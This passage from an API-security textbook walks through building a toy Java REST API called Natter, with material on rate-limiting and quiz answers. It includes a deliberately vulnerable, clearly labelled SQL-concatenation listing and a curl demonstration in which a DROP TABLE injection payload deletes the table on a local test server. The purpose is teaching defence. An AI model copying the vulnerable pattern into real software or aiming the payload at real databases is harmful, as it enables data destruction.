Personally identifiable information, or PII, is any information that
relates to an individual person and can help to identify that person. For
example, their name or address, or their date and place of birth. Many coun-
tries have data protection laws like the GDPR, which strictly control how PII
may be stored and used.
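As a sketch of the kind of record involved, the following Java class (using records, Java 16+) captures the questions listed above as fields. The field names are illustrative; chapter 3 develops a real audit log:

import java.time.Instant;

public record AuditEvent(
        Instant timestamp,     // when the request was received
        String user,           // who performed the action
        String method,         // what kind of request (GET, POST, ...)
        String path,           // what resource was being accessed
        int status) {          // was the request successful?

    public String toLogLine() {
        // One event per line keeps the log easy to parse and analyze.
        return String.format("%s %s %s %s %d",
                timestamp, user, method, path, status);
    }
}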
1.5.5 Rate-limiting
The last mechanisms we will consider are for preserving availability in the face of mali-
cious or accidental DoS attacks. A DoS attack works by exhausting some finite resource
that your API requires to service legitimate requests. Such resources include CPU time,
memory and disk usage, power, and so on. By flooding your API with bogus requests,
these resources become tied up servicing those requests and not others. As well as send-
ing large numbers of requests, an attacker may also send overly large requests that con-
sume a lot of memory or send requests very slowly so that resources are tied up for a
long time without the malicious client needing to expend much effort.
The key to fending off these attacks is to recognize that a client (or group of cli-
ents) is using more than their fair share of some resource: time, memory, number of
connections, and so on. By limiting the resources that any one user is allowed to con-
sume, we can reduce the risk of attack. Once a user has authenticated, your applica-
tion can enforce quotas that restrict what they are allowed to do. For example, you
might restrict each user to a certain number of API requests per hour, preventing
them from flooding the system with too many requests. There are often business rea-
sons to do this for billing purposes, as well as security benefits. Due to the application-
specific nature of quotas, we won’t cover them further in this book.
DEFINITION
A quota is a limit on the number of resources that an individual
user account can consume. For example, you may only allow a user to post
five messages per day.
Before a user has logged in you can apply simpler rate-limiting to restrict the number
of requests overall, or from a particular IP address or range. To apply rate-limiting, the
API (or a load balancer) keeps track of how many requests per second it is serving.
Once a predefined limit is reached then the system rejects new requests until the rate
falls back under the limit. A rate-limiter can either completely close connections when
the limit is exceeded or else slow down the processing of requests, a process known as
throttling. When a distributed DoS is in progress, malicious requests will be coming
from many different machines on different IP addresses. It is therefore important to
be able to apply rate-limiting to a whole group of clients rather than individually. Rate-
limiting attempts to ensure that large floods of requests are rejected before the system
is completely overwhelmed and ceases functioning entirely.
DEFINITION
Throttling is a process by which a client’s requests are slowed
down without disconnecting the client completely. Throttling can be achieved
either by queueing requests for later processing, or else by responding to the
requests with a status code telling the client to slow down. If the client doesn’t
slow down, then subsequent requests are rejected.
The most important aspect of rate-limiting is that it should use fewer resources than
would be used if the request were processed normally. For this reason, rate-limiting is
often performed in highly optimized code running in an off-the-shelf load balancer,
reverse proxy, or API gateway that can sit in front of your API to protect it from DoS
attacks rather than having to add this code to each API. Some commercial companies
offer DoS protection as a service. These companies have large global infrastructure
that is able to absorb the traffic from a DoS attack and quickly block abusive clients.
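The following minimal sketch shows the core bookkeeping of a rate-limiter in Java, using a fixed one-second window. As noted above, real deployments usually perform this in a gateway or load balancer, and production implementations typically prefer a sliding window or token bucket; this is only to show the idea:

import java.util.Map;
import java.util.concurrent.ConcurrentHashMap;
import java.util.concurrent.atomic.AtomicInteger;

public class RateLimiter {
    private final int limitPerSecond;
    private final Map<String, AtomicInteger> counters = new ConcurrentHashMap<>();
    private long windowStart = System.currentTimeMillis();

    public RateLimiter(int limitPerSecond) {
        this.limitPerSecond = limitPerSecond;
    }

    public synchronized boolean allow(String clientId) {
        long now = System.currentTimeMillis();
        if (now - windowStart >= 1000) {   // start a new one-second window
            counters.clear();
            windowStart = now;
        }
        // Reject the request if this client has exceeded its quota; the
        // caller should then respond with HTTP 429 Too Many Requests.
        return counters.computeIfAbsent(clientId, k -> new AtomicInteger())
                       .incrementAndGet() <= limitPerSecond;
    }
}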
Pop quiz
6 Which of the STRIDE threats does rate-limiting protect against?
a Spoofing
b Tampering
c Repudiation
d Information disclosure
e Denial of service
f Elevation of privilege
7 The WebAuthn standard (https://www.w3.org/TR/webauthn/) allows hardware security keys to be used by a user to authenticate to a website. Which of the three authentication factors from section 1.5.2 best describes this method of authentication?
The answers are at the end of the chapter.

In the next chapter, we will get our hands dirty with a real API and apply some of the techniques we have discussed in this chapter.
Answers to pop quiz questions
1 c, e, and f. While other aspects of security may be relevant to different APIs, these three disciplines are the bedrock of API security.
2 d. An API gateway is a specialized type of reverse proxy.
3 Confidentiality, Integrity, and Availability.
4 b. Data flows that cross trust boundaries are the most likely place for threats to occur. APIs often exist at trust boundaries.
5 Repudiation. By disabling audit logging, the rogue system administrator will later be able to deny performing actions on the system as there will be no record.
6 e. Rate-limiting primarily protects against denial of service attacks by preventing a single attacker from overloading the API with requests.
7 A hardware security key is something you have. They are usually small devices that can be plugged into a USB port on your laptop and can be attached to your key ring.
Summary

- You learned what an API is and the elements of API security, drawing on aspects of information security, network security, and application security.
- You can define security for your API in terms of assets and security goals.
- The basic API security goals are confidentiality, integrity, and availability, as well as accountability, privacy, and others.
- You can identify threats and assess risk using frameworks such as STRIDE.
- Security mechanisms can be used to achieve your security goals, including encryption, authentication, access control, audit logging, and rate-limiting.
Secure API development

This chapter covers
- Setting up an example API project
- Understanding secure development principles
- Identifying common attacks against APIs
- Validating input and producing safe output
I’ve so far talked about API security in the abstract, but in this chapter, you’ll dive in
and look at the nuts and bolts of developing an example API. I’ve written many APIs
in my career and now spend my days reviewing the security of APIs used for critical
security operations in major corporations, banks, and multinational media organiza-
tions. Although the technologies and techniques vary from situation to situation and
from year to year, the fundamentals remain the same. In this chapter you’ll learn how
to apply basic secure development principles to API development, so that you can
build more advanced security measures on top of a firm foundation.
2.1 The Natter API

You’ve had the perfect business idea. What the world needs is a new social network. You’ve got the name and the concept: Natter—the social network for coffee mornings, book groups, and other small gatherings. You’ve defined your minimum viable product, somehow received some funding, and now need to put together an API and a simple web client. You’ll soon be the new Mark Zuckerberg, rich beyond your dreams, and considering a run for president.
Just one small problem: your investors are worried about security. Now you must
convince them that you’ve got this covered, and that they won’t be a laughing stock on
launch night or faced with hefty legal liabilities later. Where do you start?
Although this scenario might not be much like anything you’re working on, if
you’re reading this book the chances are that at some point you’ve had to think about
the security of an API that you’ve designed, built, or been asked to maintain. In this
chapter, you’ll build a toy API example, see examples of attacks against that API, and
learn how to apply basic secure development principles to eliminate those attacks.
2.1.1 Overview of the Natter API
The Natter API is split into two REST endpoints, one for normal users and one for mod-
erators who have special privileges to tackle abusive behavior. Interactions between
users are built around a concept of social spaces, which are invite-only groups. Anyone
can sign up and create a social space and then invite their friends to join. Any user in
the group can post a message to the group, and it can be read by any other member of
the group. The creator of a space becomes the first moderator of that space.
The overall API deployment is shown in figure 2.1. The two APIs are exposed over
HTTP and use JSON for message content, for both mobile and web clients. Connec-
tions to the shared database use standard SQL over Java’s JDBC API.
Figure 2.1 Natter exposes two APIs—one for normal users and one for moderators. For simplicity, both share the same database. Mobile and web clients communicate with the API using JSON over HTTP, although the APIs communicate with the database using SQL over JDBC. The Natter API handles creation of social spaces and keeping track of messages within a space, while the Moderation API allows privileged users (moderators) to delete offensive messages.
The Natter API offers the following operations:

- A HTTP POST request to the /spaces URI creates a new social space. The user that performs this POST operation becomes the owner of the new space. A unique identifier for the space is returned in the response.
- Users can add messages to a social space by sending a POST request to /spaces/<spaceId>/messages where <spaceId> is the unique identifier of the space.
- The messages in a space can be queried using a GET request to /spaces/<spaceId>/messages. A since=<timestamp> query parameter can be used to limit the messages returned to a recent period.
- Finally, the details of individual messages can be obtained using a GET request to /spaces/<spaceId>/messages/<messageId>.
The moderator API contains a single operation to delete a message by sending a
DELETE request to the message URI. A Postman collection to help you use the API is
available from https://www.getpostman.com/collections/ef49c7f5cba0737ecdfd. To
import the collection in Postman, go to File, then Import, and select the Link tab.
Then enter the link, and click Continue.
TIP Postman (https://www.postman.com) is a widely used tool for exploring
and documenting HTTP APIs. You can use it to test examples for the APIs
developed in this book, but I also provide equivalent commands using simple
tools throughout the book.
In this chapter, you will implement just the operation to create a new social space.
Operations for posting messages to a space and reading messages are left as an exer-
cise. The GitHub repository accompanying the book (https://github.com/NeilMadden/
apisecurityinaction) contains sample implementations of the remaining operations in
the chapter02-end branch.
2.1.2 Implementation overview
The Natter API is written in Java 11 using the Spark Java (http://sparkjava.com)
framework (not to be confused with the Apache Spark data analytics platform). To
make the examples as clear as possible to non-Java developers, they are written in a
simple style, avoiding too many Java-specific idioms. The code is also written for clarity
and simplicity rather than production-readiness. Maven is used to build the code
examples, and an H2 in-memory database (https://h2database.com) is used for data
storage. The Dalesbred database abstraction library (https://dalesbred.org) is used to
provide a more convenient interface to the database than Java’s JDBC interface, with-
out bringing in the complexity of a full object-relational mapping framework.
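To give a flavor of what that convenience means in practice, here is a sketch comparing a simple query in raw JDBC with the same query through Dalesbred. The countSpaces methods and the query itself are illustrative, not part of the Natter API.

import java.sql.SQLException;
import javax.sql.DataSource;
import org.dalesbred.Database;

public class QueryComparison {
    // Raw JDBC: explicit connection, statement, and result-set handling.
    static long countSpacesJdbc(DataSource datasource) throws SQLException {
        try (var conn = datasource.getConnection();
             var stmt = conn.prepareStatement("SELECT COUNT(*) FROM spaces");
             var rs = stmt.executeQuery()) {
            rs.next();
            return rs.getLong(1);
        }
    }

    // Dalesbred: the same query in a single call.
    static long countSpacesDalesbred(Database database) {
        return database.findUniqueLong("SELECT COUNT(*) FROM spaces");
    }
}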
Detailed instructions on installing these dependencies for Mac, Windows, and
Linux are in appendix A. If you don’t have all or any of these installed, be sure you
have them ready before you continue.
TIP For the best learning experience, it is a good idea to type out the listings in this book by hand, so that you are sure you understand every line. But if you want to get going more quickly, the full source code of each chapter is available on GitHub from https://github.com/NeilMadden/apisecurityinaction. Follow the instructions in the README.md file to get set up.
2.1.3 Setting up the project
Use Maven to generate the basic project structure, by running the following com-
mand in the folder where you want to create the project:
mvn archetype:generate \
➥ -DgroupId=com.manning.apisecurityinaction \
➥ -DartifactId=natter-api \
➥ -DarchetypeArtifactId=maven-archetype-quickstart \
➥ -DarchetypeVersion=1.4 -DinteractiveMode=false
If this is the first time that you’ve used Maven, it may take some time as it downloads
the dependencies that it needs. Once it completes, you’ll be left with the following
project structure, containing the initial Maven project file (pom.xml), and an App
class and AppTest unit test class under the required Java package folder structure.
natter-api
├── pom.xml
└── src
├── main
│ └── java
│ └── com
│ └── manning
│ └── apisecurityinaction
│ └── App.java
└── test
└── java
└── com
└── manning
└── apisecurityinaction
└── AppTest.java
You first need to replace the generated Maven project file with one that lists the
dependencies that you’ll use. Locate the pom.xml file and open it in your favorite edi-
tor or IDE. Select the entire contents of the file and delete it, then paste the contents
of listing 2.1 into the editor and save the new file. This ensures that Maven is config-
ured for Java 11, sets up the main class to point to the Main class (to be written
shortly), and configures all the dependencies you need.
NOTE At the time of writing, the latest version of the H2 database is 1.4.200,
but this version causes some errors with the examples in this book. Please use
version 1.4.197 as shown in the listing.
Listing 2.1 pom.xml

<?xml version="1.0" encoding="UTF-8"?>
<project xmlns="http://maven.apache.org/POM/4.0.0"
    xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
    xsi:schemaLocation="http://maven.apache.org/POM/4.0.0
        http://maven.apache.org/xsd/maven-4.0.0.xsd">
  <modelVersion>4.0.0</modelVersion>

  <groupId>com.manning.api-security-in-action</groupId>
  <artifactId>natter-api</artifactId>
  <version>1.0.0-SNAPSHOT</version>

  <properties>
    <!-- Configure Maven for Java 11. -->
    <maven.compiler.source>11</maven.compiler.source>
    <maven.compiler.target>11</maven.compiler.target>
    <!-- Set the main class for running the sample code. -->
    <exec.mainClass>
      com.manning.apisecurityinaction.Main
    </exec.mainClass>
  </properties>

  <dependencies>
    <!-- Include the latest stable versions of H2, Spark,
         Dalesbred, and JSON.org. -->
    <dependency>
      <groupId>com.h2database</groupId>
      <artifactId>h2</artifactId>
      <version>1.4.197</version>
    </dependency>
    <dependency>
      <groupId>com.sparkjava</groupId>
      <artifactId>spark-core</artifactId>
      <version>2.9.2</version>
    </dependency>
    <dependency>
      <groupId>org.json</groupId>
      <artifactId>json</artifactId>
      <version>20200518</version>
    </dependency>
    <dependency>
      <groupId>org.dalesbred</groupId>
      <artifactId>dalesbred</artifactId>
      <version>1.3.2</version>
    </dependency>
    <!-- Include slf4j to enable debug logging for Spark. -->
    <dependency>
      <groupId>org.slf4j</groupId>
      <artifactId>slf4j-simple</artifactId>
      <version>1.7.30</version>
    </dependency>
  </dependencies>
</project>
You can now delete the App.java and AppTest.java files, because you’ll be writing new
versions of these as we go.
2.1.4 Initializing the database
To get the API up and running, you’ll need a database to store the messages that
users send to each other in a social space, as well as the metadata about each social
space, such as who created it and what it is called. While a database is not essential for
this example, most real-world APIs will use one to store data, and so we will use one
here to demonstrate secure development when interacting with a database. The
schema is very simple and shown in figure 2.2. It consists of just two entities: social
spaces and messages. Spaces are stored in the spaces database table, along with the
name of the space and the name of the owner who created it. Messages are stored in
the messages table, with a reference to the space they are in, as well as the message
content (as text), the name of the user who posted the message, and the time at which
it was created.
Using your favorite editor or IDE, create a file schema.sql under natter-api/src/main/
resources and copy the contents of listing 2.2 into it. It includes a table named spaces
for keeping track of social spaces and their owners. A sequence is used to allocate
unique IDs for spaces. If you haven’t used a sequence before, it’s a bit like a special
table that returns a new value every time you read from it.
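If you haven't seen this in action, the following sketch shows how the API will later read from the sequence through Dalesbred to allocate an ID (the same call appears in listing 2.4; the wrapper method here is illustrative scaffolding):

// Each call to the sequence returns a fresh, unique value.
static long nextSpaceId(org.dalesbred.Database database) {
    return database.findUniqueLong("SELECT NEXT VALUE FOR space_id_seq;");
}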
Another table, messages, keeps track of individual messages sent to a space, along
with who the author was, when it was sent, and so on. We index this table by time, so
that you can quickly search for new messages that have been posted to a space since a
user last logged on.
Figure 2.2 The Natter database schema consists of social spaces and messages within those spaces. Spaces have an owner and a name, while messages have an author, the text of the message, and the time at which the message was sent. A space can have many messages, but each message is in exactly one space. Unique IDs for messages and spaces are generated automatically using SQL sequences.
Listing 2.2 The database schema: schema.sql

-- The spaces table describes who owns which social spaces.
CREATE TABLE spaces(
    space_id INT PRIMARY KEY,
    name VARCHAR(255) NOT NULL,
    owner VARCHAR(30) NOT NULL
);
-- A sequence ensures uniqueness of primary keys.
CREATE SEQUENCE space_id_seq;

-- The messages table contains the actual messages.
CREATE TABLE messages(
    space_id INT NOT NULL REFERENCES spaces(space_id),
    msg_id INT PRIMARY KEY,
    author VARCHAR(30) NOT NULL,
    msg_time TIMESTAMP NOT NULL DEFAULT CURRENT_TIMESTAMP,
    msg_text VARCHAR(1024) NOT NULL
);
CREATE SEQUENCE msg_id_seq;

-- Index messages by timestamp to allow catching up on recent messages.
CREATE INDEX msg_timestamp_idx ON messages(msg_time);
CREATE UNIQUE INDEX space_name_idx ON spaces(name);
Fire up your editor again and create the file Main.java under natter-api/src/main/
java/com/manning/apisecurityinaction (where Maven generated the App.java for
you earlier). The following listing shows the contents of this file. In the main method,
you first create a new JdbcConnectionPool object. This is a H2 class that implements
the standard JDBC DataSource interface, while providing simple pooling of connec-
tions internally. You can then wrap this in a Dalesbred Database object using the
Database.forDataSource() method. Once you’ve created the connection pool, you
can then load the database schema from the schema.sql file that you created earlier.
When you build the project, Maven will copy any files in the src/main/resources folder
into the .jar file it creates. You can therefore use the Class.getResource() method to
find the file from the Java classpath, as shown in listing 2.3.
Listing 2.3 Setting up the database connection pool

package com.manning.apisecurityinaction;

import java.nio.file.*;

import org.dalesbred.*;
import org.h2.jdbcx.*;
import org.json.*;

public class Main {

    public static void main(String... args) throws Exception {
        // Create a JDBC DataSource object for the in-memory database.
        var datasource = JdbcConnectionPool.create(
            "jdbc:h2:mem:natter", "natter", "password");
        var database = Database.forDataSource(datasource);
        createTables(database);
    }

    private static void createTables(Database database)
            throws Exception {
        // Load the table definitions from schema.sql.
        var path = Paths.get(
            Main.class.getResource("/schema.sql").toURI());
        database.update(Files.readString(path));
    }
}
2.2 Developing the REST API
Now that you’ve got the database in place, you can start to write the actual REST APIs
that use it. You’ll flesh out the implementation details as we progress through the
chapter, learning secure development principles as you go.
Rather than implement all your application logic directly within the Main class,
you’ll extract the core operations into several controller objects. The Main class will
then define mappings between HTTP requests and methods on these controller
objects. In chapter 3, you will add several security mechanisms to protect your API,
and these will be implemented as filters within the Main class without altering the con-
troller objects. This is a common pattern when developing REST APIs and makes the
code a bit easier to read as the HTTP-specific details are separated from the core logic
of the API. Although you can write secure code without implementing this separation,
it is much easier to review security mechanisms if they are clearly separated rather
than mixed into the core logic.
DEFINITION A controller is a piece of code in your API that responds to requests
from users. The term comes from the popular model-view-controller (MVC)
pattern for constructing user interfaces. The model is a structured view of
data relevant to a request, while the view is the user interface that displays that
data to the user. The controller then processes requests made by the user and
updates the model appropriately. In a typical REST API, there is no view com-
ponent beyond simple JSON formatting, but it is still useful to structure your
code in terms of controller objects.
2.2.1 Creating a new space
The first operation you’ll implement is to allow a user to create a new social space,
which they can then claim as owner. You’ll create a new SpaceController class that
will handle all operations related to creating and interacting with social spaces. The
controller will be initialized with the Dalesbred Database object that you created in
listing 2.3. The createSpace method will be called when a user creates a new social
space, and Spark will pass in a Request and a Response object that you can use to
implement the operation and produce a response.
The code follows the general pattern of many API operations:

1 First, we parse the input and extract variables of interest.
2 Then we start a database transaction and perform any actions or queries requested.
3 Finally, we prepare a response, as shown in figure 2.3.

Figure 2.3 An API operation can generally be separated into three phases: first we parse the input and extract variables of interest, then we perform the actual operation, and finally we prepare some output that indicates the status of the operation.
In this case, you’ll use the json.org library to parse the request body as JSON and
extract the name and owner of the new space. You’ll then use Dalesbred to start a
transaction against the database and create the new space by inserting a new row into
the spaces database table. Finally, if all was successful, you’ll create a 201 Created
response with some JSON describing the newly created space. As is required for a
HTTP 201 response, you will set the URI of the newly created space in the Location
header of the response.
Navigate to the Natter API project you created and find the src/main/java/com/
manning/apisecurityinaction folder. Create a new sub-folder named “controller”
under this location. Then open your text editor and create a new file called Space-
Controller.java in this new folder. The resulting file structure should look as follows,
with the new items highlighted in bold:
natter-api
├── pom.xml
└── src
├── main
│ └── java
│ └── com
│ └── manning
│ └── apisecurityinaction
│ ├── Main.java
│ └── controller
│ └── SpaceController.java
└── test
└── …
Open the SpaceController.java file in your editor again and type in the contents of list-
ing 2.4 and click Save.
WARNING The code as written contains a serious security vulnerability, known
as an SQL injection vulnerability. You’ll fix that in section 2.4. I’ve marked the
broken line of code with a comment to make sure you don’t accidentally copy
this into a real application.
Listing 2.4 Creating a new social space

package com.manning.apisecurityinaction.controller;

import java.sql.SQLException;

import org.dalesbred.Database;
import org.json.*;
import spark.*;

public class SpaceController {
    private final Database database;

    public SpaceController(Database database) {
        this.database = database;
    }

    public JSONObject createSpace(Request request, Response response)
            throws SQLException {
        // Parse the request payload and extract details from the JSON.
        var json = new JSONObject(request.body());
        var spaceName = json.getString("name");
        var owner = json.getString("owner");

        // Start a database transaction.
        return database.withTransaction(tx -> {
            // Generate a fresh ID for the social space.
            var spaceId = database.findUniqueLong(
                "SELECT NEXT VALUE FOR space_id_seq;");

            // WARNING: this next line of code contains a
            // security vulnerability!
            database.updateUnique(
                "INSERT INTO spaces(space_id, name, owner) " +
                "VALUES(" + spaceId + ", '" + spaceName +
                "', '" + owner + "');");

            // Return a 201 Created status code with the URI of
            // the space in the Location header.
            response.status(201);
            response.header("Location", "/spaces/" + spaceId);

            return new JSONObject()
                .put("name", spaceName)
                .put("uri", "/spaces/" + spaceId);
        });
    }
}
2.3 Wiring up the REST endpoints
Now that you’ve created the controller, you need to wire it up so that it will be called
when a user makes a HTTP request to create a space. To do this, you’ll need to create
a new Spark route that describes how to match incoming HTTP requests to methods in
our controller objects.
DEFINITION A route defines how to convert a HTTP request into a method call
for one of your controller objects. For example, a HTTP POST method to the
/spaces URI may result in a createSpace method being called on the Space-
Controller object.
In listing 2.5, you’ll use static imports to access the Spark API. This is not strictly neces-
sary, but it’s recommended by the Spark developers because it can make the code
more readable. Then you need to create an instance of your SpaceController object
that you created in the last section, passing in the Dalesbred Database object so that it
can access the database. You can then configure Spark routes to call methods on the
controller object in response to HTTP requests. For example, the following line of
code arranges for the createSpace method to be called when a HTTP POST request is
received for the /spaces URI:
post("/spaces", spaceController::createSpace);
Finally, because all your API responses will be JSON, we add a Spark after filter to set
the Content-Type header on the response to application/json in all cases, which is
the correct content type for JSON. As we shall see later, it is important to set correct
type headers on all responses to ensure that data is processed as intended by the cli-
ent. We also add some error handlers to produce correct JSON responses for internal
server errors and not found errors (when a user requests a URI that does not have a
defined route).
TIP Spark has three types of filters (figure 2.4). Before-filters run before the
request is handled and are useful for validation and setting defaults. After-
filters run after the request has been handled, but before any exception
handlers (if processing the request threw an exception). There are also
afterAfter-filters, which run after all other processing, including exception
handlers, and so are useful for setting headers that you want to have present
on all responses.
Figure 2.4 Spark before-filters run before the request is processed by your request handler. If the handler completes normally, then Spark will run any after-filters. If the handler throws an exception, then Spark runs the matching exception handler instead of the after-filters. Finally, afterAfter-filters are always run after every request has been processed.
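To see how the three filter types fit together, here is a minimal sketch of registering one of each. The route and the printed message are illustrative, while the after and afterAfter bodies mirror uses that appear in this chapter:

import static spark.Spark.*;

public class FilterOrderExample {
    public static void main(String... args) {
        // Runs before the request handler: useful for validation
        // and setting defaults.
        before((request, response) -> {
            System.out.println("before: " + request.pathInfo());
        });

        // Runs after a handler that completes normally, but before
        // any exception handlers.
        after((request, response) -> {
            response.type("application/json");
        });

        // Always runs, even if an exception handler produced the
        // response: a good place for headers wanted on every response.
        afterAfter((request, response) -> {
            response.header("Server", "");
        });

        get("/ping", (request, response) -> "{\"pong\": true}");
    }
}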
Locate the Main.java file in the project and open it in your text editor. Type in the
code from listing 2.5 and save the new file.
Listing 2.5 The Natter REST API endpoints

package com.manning.apisecurityinaction;

import com.manning.apisecurityinaction.controller.*;
import org.dalesbred.Database;
import org.h2.jdbcx.JdbcConnectionPool;
import org.json.*;
import java.nio.file.*;

// Use static imports to use the Spark API.
import static spark.Spark.*;

public class Main {

    public static void main(String... args) throws Exception {
        var datasource = JdbcConnectionPool.create(
            "jdbc:h2:mem:natter", "natter", "password");
        var database = Database.forDataSource(datasource);
        createTables(database);

        // Construct the SpaceController and pass it the Database object.
        var spaceController =
            new SpaceController(database);

        // Handle POST requests to the /spaces endpoint by calling the
        // createSpace method on the controller object.
        post("/spaces",
            spaceController::createSpace);

        // A basic filter to ensure all output is always treated as JSON.
        after((request, response) -> {
            response.type("application/json");
        });

        internalServerError(new JSONObject()
            .put("error", "internal server error").toString());
        notFound(new JSONObject()
            .put("error", "not found").toString());
    }

    private static void createTables(Database database) {
        // As before
    }
}
2.3.1 Trying it out
Now that we have one API operation written, we can start up the server and try it out.
The simplest way to get up and running is by opening a terminal in the project folder
and using Maven:
mvn clean compile exec:java
You should see log output to indicate that Spark has started an embedded Jetty server on
port 4567. You can then use curl to call your API operation, as in the following example:
$ curl -i -d '{"name": "test space", "owner": "demo"}'
➥ http://localhost:4567/spaces
HTTP/1.1 201 Created
Date: Wed, 30 Jan 2019 15:13:19 GMT
Location: /spaces/1
Content-Type: application/json
Transfer-Encoding: chunked
Server: Jetty(9.4.8.v20171121)
{"name":"test space","uri":"/spaces/1"}
TRY IT Try creating some different spaces with different names and owners,
or with the same name. What happens when you send unusual inputs, such as
an owner username longer than 30 characters? What about names that con-
tain special characters such as single quotes?
2.4 Injection attacks
Unfortunately, the code you’ve just written has a serious security vulnerability, known
as a SQL injection attack. Injection attacks are one of the most widespread and most
serious vulnerabilities in any software application. Injection is currently the number
one entry in the OWASP Top 10 (see sidebar).
The OWASP Top 10

The OWASP Top 10 is a listing of the top 10 vulnerabilities found in many web applications and is considered the authoritative baseline for a secure web application. Produced by the Open Web Application Security Project (OWASP) every few years, the latest edition was published in 2017 and is available from https://owasp.org/www-project-top-ten/. The Top 10 is collated from feedback from security professionals and a survey of reported vulnerabilities. While this book was being written they also published a specific API security top 10 (https://owasp.org/www-project-api-security/). The current versions list the following vulnerabilities, most of which are covered in this book:

Web application top 10                                   API security top 10
A1:2017 - Injection                                      API1:2019 - Broken Object Level Authorization
A2:2017 - Broken Authentication                          API2:2019 - Broken User Authentication
A3:2017 - Sensitive Data Exposure                        API3:2019 - Excessive Data Exposure
A4:2017 - XML External Entities (XXE)                    API4:2019 - Lack of Resources & Rate Limiting
A5:2017 - Broken Access Control                          API5:2019 - Broken Function Level Authorization
A6:2017 - Security Misconfiguration                      API6:2019 - Mass Assignment
A7:2017 - Cross-Site Scripting (XSS)                     API7:2019 - Security Misconfiguration
A8:2017 - Insecure Deserialization                       API8:2019 - Injection
A9:2017 - Using Components with Known Vulnerabilities    API9:2019 - Improper Assets Management
A10:2017 - Insufficient Logging & Monitoring             API10:2019 - Insufficient Logging & Monitoring

It’s important to note that although every vulnerability in the Top 10 is worth learning about, avoiding the Top 10 will not by itself make your application secure. There is no simple checklist of vulnerabilities to avoid. Instead, this book will teach you the general principles to avoid entire classes of vulnerabilities.
An injection attack can occur anywhere that you execute dynamic code in response
to user input, such as SQL and LDAP queries, and when running operating system
commands.
DEFINITION An injection attack occurs when unvalidated user input is included
directly in a dynamic command or query that is executed by the application,
allowing an attacker to control the code that is executed.
If you implement your API in a dynamic language, your language may have a built-in
eval() function to evaluate a string as code, and passing unvalidated user input into
such a function would be a very dangerous thing to do, because it may allow the user
to execute arbitrary code with the full permissions of your application. But there are
many cases in which you are evaluating code that may not be as obvious as calling an
explicit eval function, such as:
Building an SQL command or query to send to a database
Running an operating system command
Performing a lookup in an LDAP directory
Sending an HTTP request to another API
Generating an HTML page to send to a web browser
If user input is included in any of these cases in an uncontrolled way, the user may be
able to influence the command or query to have unintended effects. This type of vul-
nerability is known as an injection attack and is often qualified with the type of code
being injected: SQL injection (or SQLi), LDAP injection, and so on.
The Natter createSpace operation is vulnerable to a SQL injection attack because
it constructs the command to create the new social space by concatenating user input
directly into a string. The result is then sent to the database where it will be interpreted
as a SQL command. Because the syntax of the SQL command is a string and the user
input is a string, the database has no way to tell the difference.
This confusion is what allows an attacker to gain control. The offending line from
the code is the following, which concatenates the user-supplied space name and owner
into the SQL INSERT statement:
database.updateUnique(
"INSERT INTO spaces(space_id, name, owner) " +
"VALUES(" + spaceId + ", '" + spaceName +
"', '" + owner + "');");
The spaceId is a numeric value that is created by your application from a sequence, so
that is relatively safe, but the other two variables come directly from the user. In this
case, the input comes from the JSON payload, but it could equally come from query
parameters in the URL itself. All types of requests are potentially vulnerable to injec-
tion attacks, not just POST methods that include a payload.
In SQL, string values are surrounded by single quotes and you can see that the
code takes care to add these around the user input. But what happens if that user
input itself contains a single quote? Let’s try it and see:
$ curl -i -d "{\"name\": \"test'space\", \"owner\": \"demo\"}"
➥ http://localhost:4567/spaces
HTTP/1.1 500 Server Error
Date: Wed, 30 Jan 2019 16:39:04 GMT
Content-Type: text/html;charset=utf-8
Transfer-Encoding: chunked
Server: Jetty(9.4.8.v20171121)
{"error":"internal server error"}
You get one of those terrible 500 internal server error responses. If you look at the
server logs, you can see why:
org.h2.jdbc.JdbcSQLException: Syntax error in SQL statement "INSERT INTO
spaces(space_id, name, owner) VALUES(4, 'test'space', 'demo[*]');";
Header and log injection
There are examples of injection vulnerabilities that do not involve code being exe-
cuted at all. For example, HTTP headers are lines of text separated by carriage return
and new line characters ("\r\n" in Java). If you include unvalidated user input in a
HTTP header then an attacker may be able to add a "\r\n" character sequence and
then inject their own HTTP headers into the response. The same can happen when
you include user-controlled data in debug or audit log messages (see chapter 3),
allowing an attacker to inject fake log messages into the log file to confuse somebody
later attempting to investigate an attack.
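A simple defense is to validate any user-supplied value before it is written into a header or log message. The helper below is a hypothetical illustration of that check, not code from the Natter API:

public class HeaderValidation {
    // Reject carriage return and line feed characters, which are
    // what allow an attacker to inject extra headers or log lines.
    static String checkHeaderValue(String value) {
        if (value.contains("\r") || value.contains("\n")) {
            throw new IllegalArgumentException("invalid header value");
        }
        return value;
    }
}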
The single quote you included in your input has ended up causing a syntax error in
the SQL expression. What the database sees is the string 'test', followed by some
extra characters (“space”) and then another single quote. Because this is not valid
SQL syntax, it complains and aborts the transaction. But what if your input ends up
being valid SQL? In that case the database will execute it without complaint. Let’s try
running the following command instead:
$ curl -i -d "{\"name\": \"test\",\"owner\":
➥ \"'); DROP TABLE spaces; --\"}" http://localhost:4567/spaces
HTTP/1.1 201 Created
Date: Wed, 30 Jan 2019 16:51:06 GMT
Location: /spaces/9
Content-Type: application/json
Transfer-Encoding: chunked
Server: Jetty(9.4.8.v20171121)
{"name":"', ''); DROP TABLE spaces; --","uri":"/spaces/9"}
The operation completed successfully with no errors, but let’s see what happens when
you try to create another space:
$ curl -d '{"name": "test space", "owner": "demo"}'
➥ http://localhost:4567/spaces
{"error":"internal server error"}
If you look in the logs again, you find the following:
org.h2.jdbc.JdbcSQLException: Table "SPACES" not found;
Oh dear. It seems that by passing in carefully crafted input your user has managed to
delete the spaces table entirely, and your whole social network with it! Figure 2.5
shows what the database saw when you executed the first curl command with the
funny owner name. Because the user input values are concatenated into the SQL as
strings, the database ends up seeing a single string that appears to contain two different
statements: the INSERT statement we intended, and a DROP TABLE statement that the
attacker has managed to inject. The first character of the owner name is a single quote character, which closes the open quote inserted by our code. The next two characters are a close parenthesis and a semicolon, which together ensure that the INSERT statement is properly terminated. The DROP TABLE statement is then inserted (injected) after the INSERT statement. Finally, the attacker adds another semicolon and two hyphen characters, which starts a comment in SQL. This ensures that the final close quote and parenthesis inserted by the code are ignored by the database and do not cause a syntax error.

Figure 2.5 A SQL injection attack occurs when user input is mixed into a SQL statement without the database being able to tell them apart. To the database, this SQL command with a funny owner name ends up looking like two separate statements followed by a comment:

INSERT INTO spaces(space_id, name, owner) VALUES(12, 'test', ''); DROP TABLE spaces; -- ');
When these elements are put together, the result is that the database sees two valid
SQL statements: one that inserts a dummy row into the spaces table, and then another
